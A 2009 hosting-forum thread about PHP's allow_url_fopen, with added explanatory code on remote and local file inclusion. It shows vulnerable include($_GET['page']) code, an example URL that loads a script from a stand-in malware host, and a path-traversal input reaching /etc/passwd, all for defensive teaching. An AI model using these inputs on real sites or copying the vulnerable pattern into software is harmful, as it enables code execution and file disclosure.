Regular on 15/07/2009 at 3:31:27PM
Total Posts: 237
I have read in various articles that, when enabled, this poses code injection security risks.
Is it possible to disable this on my webspace (I see it is currently 'on')?
Neil
LukeM
"Imperfection"
Staff on 15/07/2009 at 4:42:07PM
Total Posts: 70
Chill Winstaaaan :D It is not that much of an issue to you, it is actually a security feature for server owners to protect themselves against users, such as you using fopen to grab external web pages and using them for malicious purposes. Just do not use fopen to reference external URLs and you will be doing the same as having allow_url_fopen turned off.
Neilj99
Regular on 15/07/2009 at 9:36:33PM
Total Posts: 237
With respect to your knowledge, I'm not entirely convinced.
I direct you to this article
http://tutorials.ausweb.com.au/web/Tutorials/PHP-and-MySql/Security-issues---allow_url_fopen/
I have and am still experiencing iframe code injection attacks on my entire webspace, and am getting sick of it.
I believe if allow_url_fopen was disabled it would help me immensely.
I have read that I can include
allow_url_fopen=off
in a site level php.ini but I have tried this and it appears not to make any difference to my webspace.
N.
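The php.ini setting Neilj99 mentions, shown weak and hardened side by side as an added example that is not part of the thread. One point that bears on why a site-level file had no effect: allow_url_fopen (and allow_url_include, which since PHP 5.2 separately controls include() and require() of URLs) are PHP_INI_SYSTEM directives, so they only take effect in the php.ini that PHP loads at startup or in an Apache php_admin_flag line, not through ini_set() or a php_flag in .htaccess.

```ini
; Added example, not configuration from the thread or from Freeola.
; These two directives are PHP_INI_SYSTEM: settable only in the php.ini
; PHP loads at startup, or in Apache config as
;   php_admin_flag allow_url_fopen Off
;   php_admin_flag allow_url_include Off
; Pick ONE of the two sections below; the later value wins if both are kept.

; --- Weak: remote URLs open with fopen()/file_get_contents(), and, because
; allow_url_include is also On, with include()/require() as well.
allow_url_fopen = On
allow_url_include = On

; --- Hardened: local files only. The cURL extension is unaffected by these
; directives, so code that fetches RSS feeds or other external resources
; with curl_exec() keeps working.
allow_url_fopen = Off
allow_url_include = Off
```

allow_url_include already defaults to Off; the line is kept explicit so an audit of the loaded configuration (`php -i | grep allow_url`) shows both values without relying on the default.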
Eccles
"Aargh! Broken..."
Staff Moderator on 15/07/2009 at 9:47:11PM
Total Posts: 697
I will see whether we can have this feature disabled. It might inconvenience some customers who use it but they should be able to use cURL instead to achieve the same thing.
If you are seeing repeated injection attacks on your site then this suggests that you are accepting input that is not sanitized. url_fopen is relatively safe if the people who write the code that makes use of it make sure they check any data it brings in. Not doing this is what causes problems and that is why it's generally considered a good idea to disable it.
Neilj99
Regular on 15/07/2009 at 10:03:15PM
Total Posts: 237
Many thanks.
...would the 'custom' site level php.ini not work if I included it in my site root - to save others' inconvenience?
N.
ncrs
Staff on 16/07/2009 at 1:51:56PM
Total Posts: 89
Neilj99 wrote:
> Many thanks.
>
> ...would the 'custom' site level php.ini not work if I included
> it in my site root - to save others' inconvenience?
>
> N.
We don't allow customers to override PHP directives via their own php.ini files as this could allow customers who changed options to not just compromise their own webspaces but other customers on the same server. However it is probably possible to add a control panel option to allow certain safe options to be overridden on the same basis as the enable global vars option (another option which can allow security risks).
Neilj99
Regular on 16/07/2009 at 1:56:07PM
Edited: 16/7/09 19:05 Total Posts: 237
Agreed.
I do hope you can invoke some kind of disabling of this. I believe it would greatly help.
I look forward to hearing any progress.
N.
Neilj99
Regular on 21/07/2009 at 7:27:48PM
Total Posts: 237
@ Eccles
Any progress on disabling this yet?
N.
Eccles
"Aargh! Broken..."
Staff Moderator on 21/07/2009 at 8:01:22PM
Total Posts: 697
As other users of our VIP service use this functionality (for things such as pulling in RSS feeds among other uses) we are unable to disable this functionality.
I must stress that the idea of this being a security risk is down to the programmer using functions relying on this not validating content properly and not due to the feature being enabled.
If you understand PHP here is a simple example:
On a page somewhere:
<?php
// ... rest of the page ...
include($_GET['page']); // page taken straight from the query string
// ...
?>
This allows someone to include other remote content by doing something similar to this:
http://www.yoursite.com/index.php?page=http://dodgymalwaresite.com?dodgyscript.php?inject
A simple fix would be to move your content pages to their own folder and then modify the code to this:
<?php
// ... rest of the page ...
include('page_dir/'.$_GET['page']); // only files under page_dir/ are meant to be reachable
// ...
?>
Try the .htaccess rules you asked support about and that may clear up your problems although we can't really help if the rewrite rules cause problems.
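The include() pattern from the post above, as an added example that is not code from the thread or from Freeola: the vulnerable form, the directory-prefixed form the post suggests, and a hardened form that maps the request onto an allowlist of page names rather than a path. The directory name page_dir, the page names, and the resolvePage()/includeSafe() helpers are assumptions made for illustration; the code targets PHP 7.1 or later. Two caveats a practitioner should keep in mind: since PHP 5.2, include() and require() of a URL are governed by allow_url_include (default Off), which allow_url_fopen on its own does not enable; and prefixing a directory stops the remote URL but not `../` traversal, so `?page=../../../../etc/passwd` still reaches a local file.

```php
<?php
// Added example, not code from the thread. Names below are assumptions.

// Hypothetical directory holding the site's own content pages.
const PAGE_DIR = __DIR__ . '/page_dir';

// Allowlist of page names the application actually ships. Anything not in
// this list is rejected before it ever reaches include().
const ALLOWED_PAGES = ['home', 'about', 'contact'];

// The vulnerable form from the thread: include() of a user-controlled value.
// With allow_url_include=On this fetches and executes a remote URL (RFI);
// even with it Off, ../ sequences still reach any readable local file (LFI).
function includeUnsafe(string $page): void
{
    include $page;
}

// The directory-prefix form from the thread. It blocks the remote URL, since
// 'page_dir/http://...' is no longer a URL, but not traversal:
// ?page=../../../../etc/passwd still resolves to a local file.
function includePrefixedOnly(string $page): void
{
    include 'page_dir/' . $page;
}

// Hardened form: resolve the request to a known page name, never to a path.
// Returns the absolute file path on success, or null when the request is
// not one of the pages we ship.
function resolvePage(string $requested): ?string
{
    // Drop any directory component and a trailing .php the caller supplies,
    // so both "about" and "about.php" map to the same page name.
    $name = basename($requested, '.php');

    // Only letters, digits, dash and underscore survive: no '/', '.', ':'.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $name)) {
        return null;
    }
    // Strict comparison: the allowlist is the single source of truth.
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null;
    }

    $path = PAGE_DIR . '/' . $name . '.php';

    // Belt and braces: after symlink/.. resolution the file must still sit
    // inside PAGE_DIR, and it must actually exist (realpath() returns false
    // otherwise).
    $real = realpath($path);
    $dir  = realpath(PAGE_DIR);
    if ($real === false || $dir === false
        || strpos($real, $dir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

function includeSafe(string $requested): void
{
    $path = resolvePage($requested);
    if ($path === null) {
        // Unknown or malformed page name: answer 404 and include nothing.
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Dispatch: ?page=about -> page_dir/about.php; everything else is a 404.
// A request such as ?page=http://dodgymalwaresite.com/x.php fails the
// character check, and ?page=../../etc/passwd fails the allowlist check.
includeSafe($_GET['page'] ?? 'home');
```

The allowlist is what does the work: once the request can only ever select one of a fixed set of names, neither allow_url_fopen nor allow_url_include matters for this code path, which is the point Eccles makes about validating input rather than relying on the server setting.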
Neilj99
Regular on 21/07/2009 at 8:17:15PM
Total Posts: 237
Many thanks for your quick response.
N.